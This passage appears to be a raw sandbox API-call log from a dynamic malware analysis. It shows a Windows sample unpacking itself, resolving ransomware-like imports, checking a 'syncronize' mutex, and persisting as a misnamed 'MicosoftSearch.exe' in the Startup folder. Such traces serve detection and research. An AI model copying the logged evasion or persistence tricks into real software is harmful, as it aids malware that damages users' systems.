\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x0b\x04\xd9\x24\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0238.108] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x42b272) returned 0x0 [0238.108] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x242aa8) returned 0x80 [0238.174] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x242aa8) returned 0x80 [0238.175] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x242aa8) returned 0x80 [0238.175] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x242aa8) returned 0x80 [0238.175] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x242aa8) returned 0x80 [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.215] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.216] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.217] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.218] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.219] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.220] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.221] GetTickCount () returned 0x670b [0238.801] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xac2080 [0238.801] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xad9ed8 [0239.495] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a00000 [0239.495] GetProcAddress (hModule=0x75a00000, lpProcName="GlobalAlloc") returned 0x75a1588e [0239.498] lstrcpyA (in: lpString1=0x450090, lpString2="Virtual" | out: lpString1="Virtual") returned="Virtual" [0239.769] lstrcatA (in: lpString1="Virtual", lpString2="Protect" | out: lpString1="VirtualProtect") returned="VirtualProtect" [0239.769] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualProtect") returned 0x75a1435f [0239.769] VirtualProtect (in: lpAddress=0xaf1d30, dwSize=0x11ebc, flNewProtect=0x40, lpflOldProtect=0x18f6c0 | out: lpflOldProtect=0x18f6c0*=0x4) returned 1 [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="LoadLibraryA") returned 0x75a149d7 [0239.777] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a00000 [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualAlloc") returned 0x75a11856 [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualProtect") returned 0x75a1435f [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualFree") returned 0x75a1186e [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="GetVersionExA") returned 0x75a13519 [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="TerminateProcess") returned 0x75a2d802 [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="ExitProcess") returned 0x75a17a10 [0239.777] GetProcAddress (hModule=0x75a00000, lpProcName="SetErrorMode") returned 0x75a11b00 [0239.777] SetErrorMode (uMode=0x400) returned 0x0 [0239.777] SetErrorMode (uMode=0x0) returned 0x400 [0239.777] GetVersionExA (in: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Dw") | out: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0239.777] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0239.779] VirtualProtect (in: lpAddress=0x400000, dwSize=0x19000, flNewProtect=0x40, lpflOldProtect=0x18fed4 | out: lpflOldProtect=0x18fed4*=0x2) returned 1 [0239.781] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.782] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75a00000 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcAddress") returned 0x75a11222 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="LoadLibraryA") returned 0x75a149d7 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForSingleObject") returned 0x75a11136 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75a11916 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="LeaveCriticalSection") returned 0x77432270 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="GetLastError") returned 0x75a111c0 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="EnterCriticalSection") returned 0x774322b0 [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="ReleaseMutex") returned 0x75a1111e [0239.782] GetProcAddress (hModule=0x75a00000, lpProcName="CloseHandle") returned 0x75a11410 [0239.782] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x73260000 [0239.937] GetProcAddress (hModule=0x73260000, lpProcName="atexit") returned 0x7327c544 [0239.937] atexit (param_1=0xaf2650) returned 0 [0239.938] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a00000 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcAddress") returned 0x75a11222 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="GetModuleHandleW") returned 0x75a134b0 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="FindNextFileW") returned 0x75a154ee [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="FindClose") returned 0x75a14442 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="MoveFileW") returned 0x75a29af0 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="GetFileSizeEx") returned 0x75a159e2 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="GetModuleFileNameW") returned 0x75a14950 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="GetFileAttributesW") returned 0x75a11b18 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="ExitProcess") returned 0x75a17a10 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="GetCommandLineW") returned 0x75a15223 [0239.938] GetProcAddress (hModule=0x75a00000, lpProcName="GetComputerNameW") returned 0x75a1dd0e [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="GetComputerNameA") returned 0x75a2b6e0 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="CreateMutexW") returned 0x75a1424c [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="lstrlenW") returned 0x75a11700 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="lstrlenA") returned 0x75a15a4b [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="GetCurrentProcess") returned 0x75a11809 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForSingleObject") returned 0x75a11136 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="GetLogicalDrives") returned 0x75a15371 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="GetTickCount") returned 0x75a1110c [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="DeleteFileW") returned 0x75a189b3 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="WideCharToMultiByte") returned 0x75a1170d [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75a11916 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="Sleep") returned 0x75a110ff [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="LeaveCriticalSection") returned 0x77432270 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="ReadFile") returned 0x75a13ed3 [0239.939] GetProcAddress (hModule=0x75a00000, lpProcName="CreateFileW") returned 0x75a13f5c [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="OpenMutexW") returned 0x75a15151 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="EnterCriticalSection") returned 0x774322b0 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForMultipleObjects") returned 0x75a14220 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="lstrcmpiW") returned 0x75a2d5cd [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="lstrcmpiA") returned 0x75a13e8e [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="DeleteCriticalSection") returned 0x774445f5 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="ReleaseMutex") returned 0x75a1111e [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="CloseHandle") returned 0x75a11410 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="GetVersion") returned 0x75a14467 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="CreateThread") returned 0x75a134d5 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="ExpandEnvironmentStringsW") returned 0x75a14173 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="QueryPerformanceCounter") returned 0x75a11725 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="QueryPerformanceFrequency") returned 0x75a141f0 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="GetCurrentProcessId") returned 0x75a111f8 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="SetFileAttributesW") returned 0x75a2d4f7 [0239.940] GetProcAddress (hModule=0x75a00000, lpProcName="GetVolumeInformationW") returned 0x75a2c860 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="WriteFile") returned 0x75a11282 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="SetFilePointerEx") returned 0x75a2c807 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="SetEndOfFile") returned 0x75a2ce2e [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="FindFirstFileW") returned 0x75a14435 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcessHeap") returned 0x75a114e9 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="HeapReAlloc") returned 0x77451f6e [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="HeapAlloc") returned 0x7743e026 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="HeapFree") returned 0x75a114c9 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="CreatePipe") returned 0x75a9415b [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="SetHandleInformation") returned 0x75a2195c [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="CreateProcessW") returned 0x75a1103d [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="CompareStringW") returned 0x75a13bca [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="CompareStringA") returned 0x75a13c5a [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="OpenProcess") returned 0x75a11986 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="TerminateProcess") returned 0x75a2d802 [0239.941] GetProcAddress (hModule=0x75a00000, lpProcName="GetSystemTime") returned 0x75a15a96 [0239.942] GetProcAddress (hModule=0x75a00000, lpProcName="SystemTimeToFileTime") returned 0x75a15a7e [0239.942] GetProcAddress (hModule=0x75a00000, lpProcName="GetLastError") returned 0x75a111c0 [0239.942] GetProcAddress (hModule=0x75a00000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a3735f [0239.942] GetProcAddress (hModule=0x75a00000, lpProcName="Process32NextW") returned 0x75a3896c [0239.942] GetProcAddress (hModule=0x75a00000, lpProcName="Process32FirstW") returned 0x75a38baf [0239.942] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74fd0000 [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="RegOpenKeyExW") returned 0x74fe468d [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="RegQueryValueExW") returned 0x74fe46ad [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="RegSetValueExW") returned 0x74fe14d6 [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="RegCloseKey") returned 0x74fe469d [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenProcessToken") returned 0x74fe4304 [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="GetTokenInformation") returned 0x74fe431c [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenSCManagerW") returned 0x74fdca64 [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenServiceW") returned 0x74fdca4c [0239.942] GetProcAddress (hModule=0x74fd0000, lpProcName="CloseServiceHandle") returned 0x74fe369c [0239.943] GetProcAddress (hModule=0x74fd0000, lpProcName="ControlService") returned 0x74ff7144 [0239.943] GetProcAddress (hModule=0x74fd0000, lpProcName="QueryServiceStatus") returned 0x74fe2a86 [0239.943] GetProcAddress (hModule=0x74fd0000, lpProcName="EnumDependentServicesW") returned 0x74fd1e3a [0239.943] GetProcAddress (hModule=0x74fd0000, lpProcName="EnumServicesStatusExW") returned 0x74fdb466 [0239.943] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75f80000 [0239.943] GetProcAddress (hModule=0x75f80000, lpProcName="SystemParametersInfoW") returned 0x75f990d3 [0239.943] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x76260000 [0239.946] GetProcAddress (hModule=0x76260000, lpProcName="ShellExecuteExW") returned 0x76281e46 [0239.946] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77410000 [0239.946] GetProcAddress (hModule=0x77410000, lpProcName="NtQuerySystemInformation") returned 0x7742fda0 [0239.946] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x73220000 [0239.947] GetProcAddress (hModule=0x73220000, lpProcName="WNetCloseEnum") returned 0x73222dd6 [0239.947] GetProcAddress (hModule=0x73220000, lpProcName="WNetOpenEnumW") returned 0x73222f06 [0239.947] GetProcAddress (hModule=0x73220000, lpProcName="WNetEnumResourceW") returned 0x73223058 [0239.947] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76fd0000 [0239.948] GetProcAddress (hModule=0x76fd0000, lpProcName="WSAStartup") returned 0x76fd3ab2 [0239.948] GetProcAddress (hModule=0x76fd0000, lpProcName="socket") returned 0x76fd3eb8 [0239.948] GetProcAddress (hModule=0x76fd0000, lpProcName="send") returned 0x76fd6f01 [0239.948] GetProcAddress (hModule=0x76fd0000, lpProcName="recv") returned 0x76fd6b0e [0239.948] GetProcAddress (hModule=0x76fd0000, lpProcName="connect") returned 0x76fd6bdd [0239.949] GetProcAddress (hModule=0x76fd0000, lpProcName="closesocket") returned 0x76fd3918 [0239.949] GetProcAddress (hModule=0x76fd0000, lpProcName="gethostbyname") returned 0x76fe7673 [0239.949] GetProcAddress (hModule=0x76fd0000, lpProcName="inet_addr") returned 0x76fd311b [0239.949] GetProcAddress (hModule=0x76fd0000, lpProcName="ntohl") returned 0x76fd2d57 [0239.949] GetProcAddress (hModule=0x76fd0000, lpProcName="htonl") returned 0x76fd2d57 [0239.949] GetProcAddress (hModule=0x76fd0000, lpProcName="htons") returned 0x76fd2d8b [0239.949] GetProcessHeap () returned 0xab0000 [0239.949] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x20) returned 0xb0ca40 [0239.949] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd24 | out: lpPerformanceCount=0x18fd24*=7161089780) returned 1 [0239.949] GetTickCount () returned 0x6dcf [0239.949] GetCurrentProcessId () returned 0x544 [0239.949] GetTickCount () returned 0x6dcf [0239.949] GetTickCount () returned 0x6dcf [0239.949] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x20) returned 0xb0ca68 [0239.949] GetVersion () returned 0x1db10106 [0239.949] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x7) returned 0xb09b88 [0239.950] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x10) returned 0xac09c8 [0239.950] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xac09c8, Size=0x20) returned 0xb0cab8 [0239.950] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xb0cab8, Size=0x40) returned 0xb0c670 [0239.950] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0xfffe) returned 0xb0d0c0 [0239.950] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0A") returned 0x84 [0239.950] HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb09b88 | out: hHeap=0xab0000) returned 1 [0239.950] lstrlenW (lpString="Global\\syncronize_") returned 18 [0239.950] HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb0c670 | out: hHeap=0xab0000) returned 1 [0239.950] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x7) returned 0xb09b88 [0239.950] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x10) returned 0xac09c8 [0239.950] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xac09c8, Size=0x20) returned 0xb0cab8 [0239.950] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xb0cab8, Size=0x40) returned 0xb0c670 [0239.950] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0xfffe) returned 0xb1d0c8 [0239.950] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0U") returned 0x88 [0239.950] HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb09b88 | out: hHeap=0xab0000) returned 1 [0239.950] lstrlenW (lpString="Global\\syncronize_") returned 18 [0239.950] HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb0c670 | out: hHeap=0xab0000) returned 1 [0239.950] GetVersion () returned 0x1db10106 [0239.950] GetCurrentProcess () returned 0xffffffff [0239.950] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fd10 | out: TokenHandle=0x18fd10*=0x8c) returned 1 [0239.950] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fd0c, TokenInformationLength=0x4, ReturnLength=0x18fd18 | out: TokenInformation=0x18fd0c, ReturnLength=0x18fd18) returned 1 [0239.951] CloseHandle (hObject=0x8c) returned 1 [0239.951] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x102 [0239.951] ExitProcess (uExitCode=0x0) [0240.055] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "8" image_name = "micosoftsearch.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe" page_root = "0x74f82000" os_pid = "0x554" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 